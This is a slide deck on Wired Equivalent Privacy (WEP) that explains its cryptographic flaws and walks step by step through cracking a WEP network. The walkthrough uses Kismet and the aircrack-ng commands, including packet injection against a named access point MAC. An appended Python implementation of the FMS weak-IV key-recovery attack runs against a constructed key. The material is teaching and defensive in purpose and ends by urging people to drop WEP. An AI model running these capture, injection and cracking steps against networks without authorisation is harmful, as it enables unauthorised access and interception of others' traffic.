The Trouble with WEP Or, cracking WiFi networks for fun & profit (not really) Jim Owens.

1 The Trouble with WEP: or, cracking WiFi networks for fun & profit (not really). Jim Owens

2 Overview
- Background and a little history
- How WEP works
- WEP's major weaknesses
- A short course in wardriving
  - Using Kismet to scout out the wireless landscape
  - Zeroing in with the aircrack-ng suite: airodump to capture traffic, aireplay to replay weakly encrypted packets, aircrack to find the key using statistical methods

3 Background & history
- Wired Equivalent Privacy
- Adopted in 1999 as part of the 802.11 standard; later carried over unchanged into the 802.11b standard
- Initially used only 40-bit secret keys, due to US technology export restrictions
- Later expanded to 104-bit keys when the export restrictions were eased
- Still used 6 times as often as WPA/WPA2 despite its known fatal weaknesses* (85% / 14% / 1%)
*Based on a 2006 survey in the Seattle area

4 How WEP works
1. A CRC-32 checksum (the integrity check value, ICV) is computed over the plaintext and appended to it
2. A 24-bit initialization vector (IV) is prepended to the shared key; IV || key seeds RC4's key scheduling algorithm
3. RC4's pseudo-random generation algorithm outputs a keystream
4. The keystream is XORed with the plaintext plus ICV
5. The IV, in plaintext, is prepended to the encrypted message
6. On receipt, the keystream is regenerated from the clear IV and the shared key, XORed with the ciphertext to produce the plaintext, and the ICV is rechecked

5 WEP's major weaknesses
- IV space too small (2^24 values)
  - On a busy network, IVs must repeat within about 5 hours
  - 50% probability that some IV repeats within about 5,000 packets (birthday bound); a repeated IV under the same key means a reused keystream, so XORing the two ciphertexts yields the XOR of the plaintexts
- RC4's key schedule leaks key material for certain "weak" IVs (Fluhrer, Mantin and Shamir): the next key byte can be guessed correctly about 5% (for some IV classes, 13%) of the time, so enough captured packets reveal the whole key
- No key management; typically just one shared key for the whole network, used for a long time
- IP traffic contains much known plaintext (e.g. the LLC/SNAP header that begins every IP frame)
- No replay protection: injected or replayed traffic is accepted and rebroadcast by the access point

6 Wardriving: Kismet
- Network detector, sniffer, IDS
- Works on 802.11a, 802.11b and 802.11g networks
- Uses passive monitoring, so it is hard to detect
- Logs sniffed packets in formats compatible with Wireshark/tcpdump and Airsnort
- Channel-hops automatically
- Optionally supports GPS for network location

7 Kismet: Install & configure
- Binary packages available for most systems
- Requires a WiFi adaptor that supports monitor mode as the "capture source"
- Logs traffic in popular formats (Wireshark, Airsnort, etc.)
- Specify the source in /etc/kismet/kismet.conf as driver,device,source_name, e.g.:
  source=ipw2200,eth1,Stella

8 Stella, the WiFi attack animal!

9 Wardriving: Recon phase
- Use Kismet to survey the WiFi landscape and to choose a target network
- Record the data the aircrack attack needs:
  - Channel number
  - SSID
  - Access point MAC address (BSSID)

10 Wardriving: Kismet

11 Wardriving: Attack phase
- Aircrack-ng: software for network detection, sniffing, WEP cracking and analysis
- Works on 802.11a, 802.11b and 802.11g
- Uses passive monitoring and packet injection
- Main tools:
  - aircrack-ng: cracking
  - airdecap: packet decryption
  - airmon: monitor-mode switching
  - aireplay: packet injection (Linux only)
  - airodump: exports captured traffic to .cap files (or IV-only .ivs files)

12 Wardriving: Aircrack procedure
1. Bring up the adapter in monitor mode on the target's channel (channel 9 here):
   # ifconfig wlan0 up
   # iwconfig wlan0 mode Monitor channel 9
2. Capture packets on that channel to a file, saving IVs only (arguments: interface, output prefix, channel, IVs-only flag):
   # airodump wlan0 ./berlin_dump 9 1
(These are the legacy aircrack tool names and argument forms; the current aircrack-ng suite calls the tools airodump-ng, aireplay-ng and aircrack-ng and takes its options as named flags.)

13 Wardriving: Airodump

14 Wardriving: Aircrack procedure
3. Replay weakly encrypted packets in interactive mode to make the access point generate more traffic, and so more IVs (-2 = interactive packet replay, -b = access point MAC, -x = packets per second):
   # aireplay -2 -b 00:14:6C:40:BA:A6 -x 512 wlan0
4. Finally, crack the WEP key from the captured IVs (-n = key length in bits; 64 = 40-bit secret key + 24-bit IV):
   # aircrack -n 64 berlin_dump.ivs

15 Wardriving: Aireplay

16 Wardriving: Aircrack
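The mechanics behind this procedure, as an added worked example in Python (this is not code from the slides or from the aircrack-ng project): the WEP encapsulation of slide 4, the IV-reuse and weak-IV weaknesses of slide 5, and the statistical key recovery that aircrack performs in step 4 above, here as the original Fluhrer-Mantin-Shamir (FMS) attack with an aircrack-style candidate search. The key 0badc0ffee, the payload, the SNAP constant and the frames built by capture_weak_iv_frames() are all constructed for the demonstration; in practice the frames would come from an airodump capture.

```python
"""WEP encapsulation and the FMS weak-IV attack, as an added worked example.
Not code from the slides or from aircrack-ng.  SECRET, PAYLOAD and the frames
built by capture_weak_iv_frames() are constructed here (assumptions)."""
import math
import struct
import zlib
from collections import Counter

SNAP = 0xAA  # first byte of the LLC/SNAP header: known plaintext in every IP frame


def rc4_ksa(key):
    """RC4 key-scheduling algorithm (WEP's key is IV || secret)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_prga(S, n):
    """RC4 pseudo-random generation algorithm: n keystream bytes from state S."""
    S, i, j, out = S[:], 0, 0, bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(data):
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(secret, iv, plaintext):
    """Slide 4, steps 1-5: append ICV, seed RC4 with IV||key, XOR, prepend clear IV."""
    ks = rc4_prga(rc4_ksa(iv + secret), len(plaintext) + 4)
    return iv + bytes(a ^ b for a, b in zip(plaintext + icv(plaintext), ks))


def wep_decrypt(secret, frame):
    """Slide 4, step 6: regenerate the keystream from the clear IV, check the ICV."""
    iv, body = frame[:3], frame[3:]
    ks = rc4_prga(rc4_ksa(iv + secret), len(body))
    data = bytes(a ^ b for a, b in zip(body, ks))
    return data[:-4], data[-4:] == icv(data[:-4])


def iv_collision_packets(p=0.5):
    """Birthday bound on packets sent until some IV repeats with probability p."""
    return math.sqrt(2 * 2 ** 24 * math.log(1 / (1 - p)))


def recover_from_iv_reuse(frame_a, frame_b, plaintext_a):
    """Same IV + same key = same keystream, so C_a ^ C_b = P_a ^ P_b."""
    assert frame_a[:3] == frame_b[:3], "frames must share an IV"
    n = min(len(plaintext_a), len(frame_b) - 7)  # skip 3-byte IV, 4-byte ICV
    return bytes(frame_a[3 + k] ^ frame_b[3 + k] ^ plaintext_a[k] for k in range(n))


def fms_votes(frames, key_prefix):
    """FMS: vote for secret byte A = len(key_prefix) using each frame's IV and its
    first keystream byte z (first ciphertext byte XOR the known SNAP byte)."""
    A = len(key_prefix)
    votes = Counter()
    for frame in frames:
        known = frame[:3] + key_prefix          # K[0..A+2]: IV plus bytes found so far
        z = frame[3] ^ SNAP
        S, j = list(range(256)), 0
        for i in range(A + 3):                  # replay the KSA as far as we can
            j = (j + S[i] + known[i]) & 0xFF
            S[i], S[j] = S[j], S[i]
        if (S[1] + S[S[1]]) & 0xFF != A + 3:    # "resolved": first output will be S[A+3]
            continue
        # Next KSA step puts S[j + S[A+3] + K[A+3]] into S[A+3]; if S[0], S[1] and
        # S[A+3] survive the remaining steps (about 5% of the time) z is that byte.
        votes[(S.index(z) - j - S[A + 3]) & 0xFF] += 1
    return votes


def fms_crack(frames, keylen, depth=4, prefix=b""):
    """Depth-first search over the top `depth` vote-getters per byte (the idea behind
    aircrack's fudge factor); a candidate is accepted only if a frame's ICV verifies."""
    if len(prefix) == keylen:
        return prefix if wep_decrypt(prefix, frames[0])[1] else None
    for byte, _ in fms_votes(frames, prefix).most_common(depth):
        found = fms_crack(frames, keylen, depth, prefix + bytes([byte]))
        if found is not None:
            return found
    return None


def capture_weak_iv_frames(secret, payload):
    """Stand-in for an airodump .ivs file: one frame per FMS weak IV (A+3, 0xFF, X).
    Real traffic yields these only occasionally, hence aireplay to provoke packets."""
    return [wep_encrypt(secret, bytes([A + 3, 0xFF, x]), payload)
            for A in range(len(secret)) for x in range(256)]


SECRET = bytes.fromhex("0badc0ffee")  # constructed 40-bit WEP key (assumption)
PAYLOAD = bytes([SNAP, SNAP, 0x03, 0, 0, 0, 0x08, 0x00]) + b"constructed IP payload"


def demo():
    """Recover SECRET from the constructed capture; returns the key bytes."""
    return fms_crack(capture_weak_iv_frames(SECRET, PAYLOAD), len(SECRET))


if __name__ == "__main__":
    print("IV repeats with p=0.5 after ~%d packets" % iv_collision_packets())
    print("recovered key:", demo().hex())
```

Each weak IV of the form (A+3, 0xFF, X) gives a correct vote for key byte A only about one time in twenty, which is why the attack wants thousands of IVs and why step 3 replays traffic to collect them faster; the ICV check at the leaves of fms_crack is what lets a wrong vote winner be discarded instead of producing a wrong key.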

17 Summary
- WEP has numerous serious flaws
- WEP's flaws are thoroughly documented
- WEP is readily exploitable in a short time, by unskilled attackers, using readily available tools
- Strong protection (WPA/WPA2) is readily available
- Bottom line: don't use WEP, period!

18 Questions?

